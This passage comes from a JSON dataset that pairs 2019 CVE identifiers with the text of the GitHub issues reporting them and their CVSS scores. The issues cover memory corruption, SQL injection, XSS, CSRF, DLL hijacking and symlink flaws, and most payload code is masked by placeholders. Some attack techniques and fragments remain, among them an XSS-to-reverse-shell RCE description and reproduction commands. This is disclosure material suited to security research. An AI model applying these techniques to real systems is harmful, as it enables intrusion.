  40071. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1641",
  40072. "Repo_new": "imagemagick/imagemagick",
  40073. "Issue_Created_At": "2019-07-18T09:43:55Z",
  40074. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG f9e NUMBERTAG aab NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG c3d9a6 in APITAG APITAG NUMBERTAG d1 in APITAG APITAG NUMBERTAG b2 in main APITAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG af NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f9e NUMBERTAG cfac in APITAG APITAG NUMBERTAG f9e NUMBERTAG e in APITAG APITAG NUMBERTAG f9e NUMBERTAG b NUMBERTAG c in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG f9e NUMBERTAG ed NUMBERTAG in malloc ( PATHTAG NUMBERTAG f9e NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG fb NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f9e NUMBERTAG ff NUMBERTAG in APITAG APITAG NUMBERTAG f9e NUMBERTAG d in APITAG APITAG NUMBERTAG f9e NUMBERTAG b7ec in APITAG APITAG NUMBERTAG f9e NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fd fd fd[fd]fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  40075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40076. "severity": "HIGH",
  40077. "baseScore": 8.8,
  40078. "impactScore": 5.9,
  40079. "exploitabilityScore": 2.8
  40080. },
  40081. {
  40082. "CVE_ID": "CVE-2019-17543",
  40083. "Issue_Url_old": "https://github.com/lz4/lz4/issues/801",
  40084. "Issue_Url_new": "https://github.com/lz4/lz4/issues/801",
  40085. "Repo_new": "lz4/lz4",
  40086. "Issue_Created_At": "2019-10-16T08:43:07Z",
  40087. "description": "Question concerning CVETAG . Hi, I am looking into CVETAG NUMBERTAG specifically I am trying to verify if the issue is present since NUMBERTAG as stated in the comment NUMBERTAG I am testing lz4 version NUMBERTAG and tried to reproduce the issue using an asan build. The command used to reproduce was 'lz NUMBERTAG l APITAG outfile'. Verified that libasan.so was used by lz4 and APITAG verified that the correct liblz4 library is used and that the reproduce is the correct. But still do not see a problem with the old APITAG It would be great if someone could provide some feedback concerning the statement, that the problem is present since NUMBERTAG Please note that I used a patch for lz4 which forces the lz4 binary to use the shared library instead of inlining all the LZ4_ functions. But I think that should not cause any problems NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG CVETAG",
  40088. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40089. "severity": "HIGH",
  40090. "baseScore": 8.1,
  40091. "impactScore": 5.9,
  40092. "exploitabilityScore": 2.2
  40093. },
  40094. {
  40095. "CVE_ID": "CVE-2019-17552",
  40096. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/77",
  40097. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/77",
  40098. "Repo_new": "idreamsoft/iCMS",
  40099. "Issue_Created_At": "2019-09-02T20:36:10Z",
  40100. "description": "There is a SQL injection in FILETAG of iCMS. The cause of the vulnerability is similar to issus NUMBERTAG URLTAG FILETAG But the payload need a Two dimensional array, which is different from the previous one. CODETAG Step NUMBERTAG save the payload output in an txt file NUMBERTAG import the file as scheme NUMBERTAG see the different from the return time Pics: sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG sleep NUMBERTAG FILETAG",
  40101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40102. "severity": "CRITICAL",
  40103. "baseScore": 9.8,
  40104. "impactScore": 5.9,
  40105. "exploitabilityScore": 3.9
  40106. },
  40107. {
  40108. "CVE_ID": "CVE-2019-17553",
  40109. "Issue_Url_old": "https://github.com/sari3l/cve-test/issues/1",
  40110. "Issue_Url_new": "https://github.com/sari3l/cve-test/issues/1",
  40111. "Repo_new": "sari3l/cve-test",
  40112. "Issue_Created_At": "2019-10-14T10:55:18Z",
  40113. "description": "APITAG beta NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG web can see the web application uses gpc to filter variables in the form. code in APITAG FILETAG but the developers use the get_sql function for secondary filtering, causing escape single quotes. FILETAG payload FILETAG attack with sqlmap ERRORTAG",
  40114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40115. "severity": "CRITICAL",
  40116. "baseScore": 9.8,
  40117. "impactScore": 5.9,
  40118. "exploitabilityScore": 3.9
  40119. },
  40120. {
  40121. "CVE_ID": "CVE-2019-17580",
  40122. "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/1",
  40123. "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/1",
  40124. "Repo_new": "tooonyy/dormsystem",
  40125. "Issue_Created_At": "2019-10-14T12:28:18Z",
  40126. "description": "SQL Injection Vulnerability in FILETAG .",
  40127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40128. "severity": "CRITICAL",
  40129. "baseScore": 9.8,
  40130. "impactScore": 5.9,
  40131. "exploitabilityScore": 3.9
  40132. },
  40133. {
  40134. "CVE_ID": "CVE-2019-17581",
  40135. "Issue_Url_old": "https://github.com/Tooonyy/dormsystem/issues/2",
  40136. "Issue_Url_new": "https://github.com/tooonyy/dormsystem/issues/2",
  40137. "Repo_new": "tooonyy/dormsystem",
  40138. "Issue_Created_At": "2019-10-14T12:37:15Z",
  40139. "description": "XSS vulnerability in FILETAG / payload= /> APITAG alert NUMBERTAG APITAG .",
  40140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40141. "severity": "MEDIUM",
  40142. "baseScore": 6.1,
  40143. "impactScore": 2.7,
  40144. "exploitabilityScore": 2.8
  40145. },
  40146. {
  40147. "CVE_ID": "CVE-2019-17582",
  40148. "Issue_Url_old": "https://github.com/nih-at/libzip/issues/5",
  40149. "Issue_Url_new": "https://github.com/nih-at/libzip/issues/5",
  40150. "Repo_new": "nih-at/libzip",
  40151. "Issue_Created_At": "2017-08-24T10:44:17Z",
  40152. "description": "use after free in _zip_buffer_free (zip_buffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG I don't know if it is related to the bug fixed here URLTAG",
  40153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40154. "severity": "CRITICAL",
  40155. "baseScore": 9.8,
  40156. "impactScore": 5.9,
  40157. "exploitabilityScore": 3.9
  40158. },
  40159. {
  40160. "CVE_ID": "CVE-2019-17583",
  40161. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/83",
  40162. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/83",
  40163. "Repo_new": "idreamsoft/iCMS",
  40164. "Issue_Created_At": "2019-10-12T08:07:49Z",
  40165. "description": "DOS attack. DOS attack exists in view comment module FILETAG Your review comment feature allows you to query up to NUMBERTAG billion comments. FILETAG Attackers will cause your database to jam or crash through such an attack FILETAG Moreover, the query does not limit CSRF attacks, which can cause database crashes by constructing malicious links",
  40166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40167. "severity": "HIGH",
  40168. "baseScore": 7.5,
  40169. "impactScore": 3.6,
  40170. "exploitabilityScore": 3.9
  40171. },
  40172. {
  40173. "CVE_ID": "CVE-2019-17593",
  40174. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/1",
  40175. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/1",
  40176. "Repo_new": "Cherry-toto/jizhicms",
  40177. "Issue_Created_At": "2019-09-25T04:41:38Z",
  40178. "description": "\u6dfb\u52a0\u7ba1\u7406\u5458\u5904\u5b58\u5728csrf\u6f0f\u6d1e. \u60a8\u597d\uff0c APITAG site request forgery\uff0c\u7b80\u79f0CSRF\uff09\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG > poc\u5982\u4e0b\uff1a CODETAG \u6709\u95ee\u9898\u7684\u8bdd\u60a8\u53ef\u4ee5\u7ee7\u7eed\u548c\u6211\u8054\u7cfb",
  40179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40180. "severity": "HIGH",
  40181. "baseScore": 8.8,
  40182. "impactScore": 5.9,
  40183. "exploitabilityScore": 2.8
  40184. },
  40185. {
  40186. "CVE_ID": "CVE-2019-17596",
  40187. "Issue_Url_old": "https://github.com/golang/go/issues/34960",
  40188. "Issue_Url_new": "https://github.com/golang/go/issues/34960",
  40189. "Repo_new": "golang/go",
  40190. "Issue_Created_At": "2019-10-17T18:43:01Z",
  40191. "description": "crypto/dsa: invalid public key causes panic in APITAG Invalid DSA public keys can cause a panic in APITAG In particular, using APITAG on a crafted NUMBERTAG certificate chain can lead to a panic, even if the certificates don\u2019t chain to a trusted root. The chain can be delivered via a crypto/tls connection to a client, or to a server that accepts and verifies client certificates. net/http clients can be made to crash by an HTTPS server, while net/http servers that accept client certificates will recover the panic and are unaffected. Moreover, an application might crash invoking crypto NUMBERTAG APITAG APITAG on an NUMBERTAG certificate request, parsing a PATHTAG Entity, or during a PATHTAG conversation. Finally, a PATHTAG client can panic due to a malformed host key, while a server could panic if either APITAG accepts a malformed public key, or if APITAG accepts a certificate with a malformed public key. The issue is CVETAG .",
  40192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40193. "severity": "HIGH",
  40194. "baseScore": 7.5,
  40195. "impactScore": 3.6,
  40196. "exploitabilityScore": 3.9
  40197. },
  40198. {
  40199. "CVE_ID": "CVE-2019-17599",
  40200. "Issue_Url_old": "https://github.com/QuizandSurveyMaster/quiz_master_next/issues/795",
  40201. "Issue_Url_new": "https://github.com/quizandsurveymaster/quiz_master_next/issues/795",
  40202. "Repo_new": "quizandsurveymaster/quiz_master_next",
  40203. "Issue_Created_At": "2019-11-13T07:45:25Z",
  40204. "description": "report reflected xss vulnerability. IF YOU DO NOT FOLLOW THIS TEMPLATE, YOUR ISSUE MAY BE CLOSED!! Please provide the following information when creating your issues: Site Info APITAG Version: Latest QSM Version NUMBERTAG and NUMBERTAG Browser: chrome NUMBERTAG General description Quiz And Survey Master \u2013 Best Quiz Plugin for APITAG for APITAG is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and APITAG code via the from or till parameter. The component is: PATHTAG The attack vector is: When the Administrator is logged in, a reflected XSS may execute upon a click on a malicious URL. \u200b special conditions must be met in order to exploit this vulnerability: The wordpress security feature APITAG which is enabled by default, has to be disabled. \u200b Vulnerable code : PATHTAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Link to quiz or screenshot (if relevant): Expected behavior nothing. Actual behavior reflected XSS, victim may click the malicious url. APITAG must be logged in.) Steps to reproduce the behavior URLTAG",
  40205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40206. "severity": "MEDIUM",
  40207. "baseScore": 6.1,
  40208. "impactScore": 2.7,
  40209. "exploitabilityScore": 2.8
  40210. },
  40211. {
  40212. "CVE_ID": "CVE-2019-17625",
  40213. "Issue_Url_old": "https://github.com/ramboxapp/community-edition/issues/2418",
  40214. "Issue_Url_new": "https://github.com/ramboxapp/community-edition/issues/2418",
  40215. "Repo_new": "ramboxapp/community-edition",
  40216. "Issue_Created_At": "2019-10-16T02:51:46Z",
  40217. "description": "Stored XSS vulnerability in Rambo NUMBERTAG Issue Hey! How you doing this PATHTAG I'm doing pretty good, thanks for asking, unfortuantley I have some bad news for you ... There is a stored XSS in Rambox version NUMBERTAG that is capable of leading to RCE. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a specific payload that will produce up to (but not limited to) RCE. How (come I even tried this ;p)? The vulnerability occurs, as mentioned above, in the name field due to unsantized input. A end user is able to input anything they want into the field which will be displayed. Due to this APITAG tags and APITAG tags are also allowed. For example if we take the payload ERRORTAG and add it as the name of one of our services we will be met with the following: FILETAG As you can clearly see the tag is processed and executed within the application. If we restart Rambox, we will be met with the same message. (I was really bored at work, and since we use this I was like why the heck not right? Turns out now I have a really big vulnerability to deal with tomorrow ... YAY ME!) Impact Seeing as this repository has NUMBERTAG k stars, I'd assume the impact to be pretty significant. I'm planning on writing some exploit code for it, and will happily share that with you and the rest of the world once it's done. But you said RCE? Oh heck yes I did! Let's get RCE from a stored XSS vulnerability really quick! So as determined above, we can use anything for the name field. So what about a shell? Can w do that? I mean I don't see why not so lets find out ... Payload: ERRORTAG Since the application uses node (as stated in the about section and because it's electron) we can safely assume that we can also use node. Now all we have to do is restart the box and setup a listener. Lets try it out: FILETAG And that my friends, is how you get RCE from XSS. I'll be here all week.",
  40218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  40219. "severity": "CRITICAL",
  40220. "baseScore": 9.0,
  40221. "impactScore": 6.0,
  40222. "exploitabilityScore": 2.3
  40223. },
  40224. {
  40225. "CVE_ID": "CVE-2019-17662",
  40226. "Issue_Url_old": "https://github.com/bewest/thinvnc/issues/5",
  40227. "Issue_Url_new": "https://github.com/bewest/thinvnc/issues/5",
  40228. "Repo_new": "bewest/thinvnc",
  40229. "Issue_Created_At": "2019-10-16T08:15:49Z",
  40230. "description": "Authentication Bypass and Arbitrary file read can compromise this VNC server. An authenticated attacker can compromise the VNC server even password protected. There's a bug in the web client which is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and gives an attacker the terminal access to the remote system.",
  40231. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40232. "severity": "CRITICAL",
  40233. "baseScore": 9.8,
  40234. "impactScore": 5.9,
  40235. "exploitabilityScore": 3.9
  40236. },
  40237. {
  40238. "CVE_ID": "CVE-2019-17664",
  40239. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/107",
  40240. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/107",
  40241. "Repo_new": "nationalsecurityagency/ghidra",
  40242. "Issue_Created_At": "2019-03-07T23:07:52Z",
  40243. "description": "Uncontrolled Search Path Element when executing CMD.. Describe the bug When executing Ghidra from a given path the Java process working directory is set to this path. Then, when launching Python interpreter located in APITAG Codebrowser\" > APITAG > APITAG Ghidra will try to execute an arbitrary file APITAG located at the attacker choosen working directory. To Reproduce Steps to reproduce the behavior NUMBERTAG Copy an arbitrary Portable Executable file named APITAG into a folder, for instance: PATHTAG NUMBERTAG Open a command line and go to the choosen folder. Following the same example: cd PATHTAG NUMBERTAG Execute Ghidra from the command line: FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG ersion NUMBERTAG",
  40244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40245. "severity": "HIGH",
  40246. "baseScore": 7.8,
  40247. "impactScore": 5.9,
  40248. "exploitabilityScore": 1.8
  40249. },
  40250. {
  40251. "CVE_ID": "CVE-2019-17665",
  40252. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/286",
  40253. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/286",
  40254. "Repo_new": "nationalsecurityagency/ghidra",
  40255. "Issue_Created_At": "2019-03-28T21:41:39Z",
  40256. "description": "DLL Hijacking \"\". Describe the bug Ghidra NUMBERTAG is vulnerable to DLL hijacking because it loads, at least, APITAG from the working directory instead of loading it from the right directory where it is expected to be. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile the following code and name the resulting binary file as APITAG CODETAG NUMBERTAG Execute Ghidra from the working directory where the resulting APITAG do exist NUMBERTAG APITAG file will get executed. Expected behavior Load APITAG from the rigth directory where it is expected to be. Screenshots FILETAG Environment (please complete the following information): OS: Microsoft Windows NUMBERTAG APITAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context In practice, vulnerability can be exploited, for instance, if the user launches Ghidra Projects from the contextual menu and it comes with a malicious APITAG file. CODETAG",
  40257. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40258. "severity": "HIGH",
  40259. "baseScore": 7.8,
  40260. "impactScore": 5.9,
  40261. "exploitabilityScore": 1.8
  40262. },
  40263. {
  40264. "CVE_ID": "CVE-2019-17676",
  40265. "Issue_Url_old": "https://github.com/anx1ang/notes/issues/1",
  40266. "Issue_Url_new": "https://github.com/newkin1996/notes/issues/1",
  40267. "Repo_new": "newkin1996/notes",
  40268. "Issue_Created_At": "2019-10-09T06:58:49Z",
  40269. "description": "APITAG NUMBERTAG beta allows a CSRF attack to add a user account via a APITAG action to FILETAG , as demonstrated by an APITAG URI.. code: at PATHTAG source code: ERRORTAG Global search code about csrf. APITAG No code found to defend against CSRF attacks. exp: After the administrator logged in, open the following page ERRORTAG",
  40270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  40271. "severity": "HIGH",
  40272. "baseScore": 8.8,
  40273. "impactScore": 5.9,
  40274. "exploitabilityScore": 2.8
  40275. },
  40276. {
  40277. "CVE_ID": "CVE-2019-18214",
  40278. "Issue_Url_old": "https://github.com/PaulLereverend/NextcloudVideo_Converter/issues/22",
  40279. "Issue_Url_new": "https://github.com/paullereverend/nextcloudvideo_converter/issues/22",
  40280. "Repo_new": "paullereverend/nextcloudvideo_converter",
  40281. "Issue_Created_At": "2019-10-18T11:40:12Z",
  40282. "description": "Add queue support Security Issue]. Hi, I think that having a queue for multiple conversions. If a server is doing multiple conversions, even if it all of them are with low priority, it hangs. I suggest to have a queue, allowing only one (or multiple, settings could be changed) process at the same time. The queue can be changed using the priorities, so when a high priority process is added to the queue, it should be at the top of the queue. The users should be able to see the queue status. Not other users queue, but the position on the list. For example if the queue is NUMBERTAG user1 > video1 > processing NUMBERTAG user1 > video NUMBERTAG user2 > video NUMBERTAG user3 > video NUMBERTAG user1 > video5 The user1, can see the queue as NUMBERTAG user1 > video1 > position NUMBERTAG processing NUMBERTAG user1 > video2 > position NUMBERTAG user1 > video5 > position NUMBERTAG The user2, only can see the queue as NUMBERTAG user2 > video3 > position NUMBERTAG The users should also be able to cancel the queued jobs and, potentially cancel the current process. NOTE: It is a security issue as the users can generate a APITAG because of several concurrent processes. CVSS NUMBERTAG PATHTAG URLTAG CVSS NUMBERTAG FILETAG",
  40283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
  40284. "severity": "HIGH",
  40285. "baseScore": 7.7,
  40286. "impactScore": 4.0,
  40287. "exploitabilityScore": 3.1
  40288. },
  40289. {
  40290. "CVE_ID": "CVE-2019-18217",
  40291. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/846",
  40292. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/846",
  40293. "Repo_new": "proftpd/proftpd",
  40294. "Issue_Created_At": "2019-10-19T19:34:47Z",
  40295. "description": "Remote denial of service due to issue in network IO handling. Dear MENTIONTAG \u2014 As discussed, please find below the description of the APITAG NUMBERTAG denial of service issue. Issue Remote unauthenticated denial of service in APITAG NUMBERTAG triggered by a malformed network packet due to an incorrect handling of too long commands. Version APITAG NUMBERTAG PATHTAG Description An unauthenticated attacker can trigger an infinite loop by sending a malformed network packet due to an incorrect handling of too long commands. The issue in the network IO causes a child process that handles the client connection to consume NUMBERTAG CPU. If errno is NUMBERTAG E2BIG) due to a too long command and the EOF is reached, APITAG function will always return NUMBERTAG and will be called indefinitely due to the continue statement: CODETAG Impact Remote unauthenticated denial of service Cheers Stephan Zeisberg",
  40296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40297. "severity": "HIGH",
  40298. "baseScore": 7.5,
  40299. "impactScore": 3.6,
  40300. "exploitabilityScore": 3.9
  40301. },
  40302. {
  40303. "CVE_ID": "CVE-2019-18409",
  40304. "Issue_Url_old": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
  40305. "Issue_Url_new": "https://github.com/zenspider/ruby_parser-legacy/issues/1",
  40306. "Repo_new": "zenspider/ruby_parser-legacy",
  40307. "Issue_Created_At": "2019-10-24T12:37:36Z",
  40308. "description": "Security Issue : invalid permission on ruby files. Hi, This gem has world writable files in the release NUMBERTAG how to reproduce the issue CODETAG exploitation poc add in PATHTAG APITAG require the gem in a other projet may run the shell code with the user privilege. CODETAG Please release a new release asap.",
  40309. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  40310. "severity": "HIGH",
  40311. "baseScore": 7.8,
  40312. "impactScore": 5.9,
  40313. "exploitabilityScore": 1.8
  40314. },
  40315. {
  40316. "CVE_ID": "CVE-2019-18413",
  40317. "Issue_Url_old": "https://github.com/typestack/class-validator/issues/438",
  40318. "Issue_Url_new": "https://github.com/typestack/class-validator/issues/438",
  40319. "Repo_new": "typestack/class-validator",
  40320. "Issue_Created_At": "2019-10-19T19:11:50Z",
  40321. "description": "class validator arbitrary bypass. With this vulnerability, an attacker can bypass any security checks enforced by class validator. When class validator is used to validate user input, the attributes in the user input object will be transformed into the validation class instance. However, the transforming procedure will overwrite the internal attribute of validation class instance (e.g., constructor attribute) if the attacker injects an attribute with the same name into user input. Once this internal attribute being overwritten, class validator will be bypassed. APITAG ERRORTAG Our suggestion is that class validator should check the integrity of the constructor: if it is being corrupted, the validation should automatically fail.",
  40322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40323. "severity": "CRITICAL",
  40324. "baseScore": 9.8,
  40325. "impactScore": 5.9,
  40326. "exploitabilityScore": 3.9
  40327. },
  40328. {
  40329. "CVE_ID": "CVE-2019-18413",
  40330. "Issue_Url_old": "https://github.com/typestack/class-validator/issues/1422",
  40331. "Issue_Url_new": "https://github.com/typestack/class-validator/issues/1422",
  40332. "Repo_new": "typestack/class-validator",
  40333. "Issue_Created_At": "2021-11-25T03:20:15Z",
  40334. "description": "security: SNYK JS CLASSVALIDATOR NUMBERTAG Description APITAG URLTAG Affected versions of this package are vulnerable to Improper Input Validation via bypassing the input validation in APITAG which can lead to cross site scripting (XSS) or SQL injection. NOTE: There is an optional APITAG parameter that can be used to reduce the risk of this bypass.",
  40335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  40336. "severity": "CRITICAL",
  40337. "baseScore": 9.8,
  40338. "impactScore": 5.9,
  40339. "exploitabilityScore": 3.9
  40340. },
  40341. {
  40342. "CVE_ID": "CVE-2019-18466",
  40343. "Issue_Url_old": "https://github.com/containers/libpod/issues/3829",
  40344. "Issue_Url_new": "https://github.com/containers/podman/issues/3829",
  40345. "Repo_new": "containers/podman",
  40346. "Issue_Created_At": "2019-08-15T19:51:23Z",
  40347. "description": "podman cp dereferences symlink in host context after APITAG APITAG Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description APITAG podman cp mycontainer:/testfile /tmp/test may resolve a symlink in the host context (e.g. the file PATHTAG ) and copy it into the directory PATHTAG Steps to reproduce the issue: erik APITAG cat FILETAG container=$(buildah from scratch) mnt=$(buildah mount $container) touch \"$mnt/file \" ln s \"/file \" \"$mnt/testfile\" ln s PATHTAG APITAG buildah umount $container buildah commit $container glob1 erik APITAG rm rf /tmp/test && mkdir /tmp/test erik APITAG buildah unshare bash PATHTAG && container=$(podman create localhost/glob1 dummycmd) && podman cp $container:/testfile /tmp/test APITAG Getting image source signatures Copying blob dada6d NUMBERTAG fa NUMBERTAG done Copying config NUMBERTAG af1d7c9 done Writing manifest to image destination Storing signatures APITAG erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG ls l /etc/hosts rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG etc/hosts erik APITAG diff PATHTAG /etc/hosts erik APITAG Describe the results you received: erik APITAG ls l /tmp/test total NUMBERTAG rw rw r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG file ' rw r r NUMBERTAG erik erik NUMBERTAG Aug NUMBERTAG hosts erik APITAG Describe the results you expected: I would not have expected to see the files PATHTAG and PATHTAG _ Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : ERRORTAG Output of APITAG : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): erik APITAG buildah version buildah version NUMBERTAG image spec NUMBERTAG runtime spec NUMBERTAG dev) erik APITAG cat /etc/issue Ubuntu NUMBERTAG LTS \\l",
  40348. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  40349. "severity": "MEDIUM",
  40350. "baseScore": 5.5,
  40351. "impactScore": 3.6,
  40352. "exploitabilityScore": 1.8
  40353. },
  40354. {
  40355. "CVE_ID": "CVE-2019-18662",
  40356. "Issue_Url_old": "https://github.com/YouPHPTube/YouPHPTube/issues/2202",
